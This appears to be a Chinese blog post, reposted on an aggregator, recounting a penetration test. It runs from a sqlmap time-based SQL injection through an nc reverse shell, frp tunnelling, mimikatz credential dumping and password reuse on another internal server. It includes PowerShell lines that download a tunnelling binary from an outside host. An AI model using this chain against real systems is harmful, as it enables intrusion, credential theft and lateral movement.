记一次渗透测试事件

编程入门 行业动态 更新时间:2024-10-24 10:20:14

记一次渗透测试<a href=https://www.elefans.com/category/jswz/34/1770959.html style=事件"/>

记一次渗透测试事件

一、漏洞发现
拿到登录的接口,丢到sqlmap里面跑一把,发现延时注入

进一步查询,发现是sa权限,直接os-shell whomai查询发现是管理员权限

os-shell执行命令太慢了,直接进行nc 反弹
执行base64 加密后的powershell命令,反弹回shell

nc shell下加账号和密码成功,mstsc远程连接发现失败
初步判断应该是在内网
配置好frpc.exe 和frpc.ini 将其下载到目标服务器
powershell (new-object System.Net.WebClient).DownloadFile(‘http://ip:8888/frpc.ini’,‘frpc.ini’)
powershell (new-object System.Net.WebClient).DownloadFile(‘http://ip:8888/frpc.exe’,‘frpc.exe’)
./frpc.exe
在frp管理页面看到目标端口已经上线

接下来进行mstsc远程连接

使用mimikatz 抓取其密码,直接报出明文

通过arp -a 发现其内网中还有一个活跃的服务器

直接在目标机上用爆出来的密码尝试远程登录,成功登录

二、总结一下思路
1 、找到sql注入,且是sa
2 、通过os-shell 反弹一个nc更容易执行命令
3 、发现是管理员权限,直接加账号,如果不上,可以考虑通过msf 或是cs去提权
4 、查询发现3389端口是开的,但是连接不上,考虑可能是在内网
5 、尝试通过frp或者其他工具将其3389端口转发出来,再进行连接
6 、登录成功后抓取用户名密码
7 、通过arp 查询相关的内网中的通信和路由
8 、尝试通过6爆出来的账号密码去碰撞其他内网机器

更多推荐

记一次渗透测试事件

本文发布于:2023-12-03 20:53:54,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1657541.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:事件   测试

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!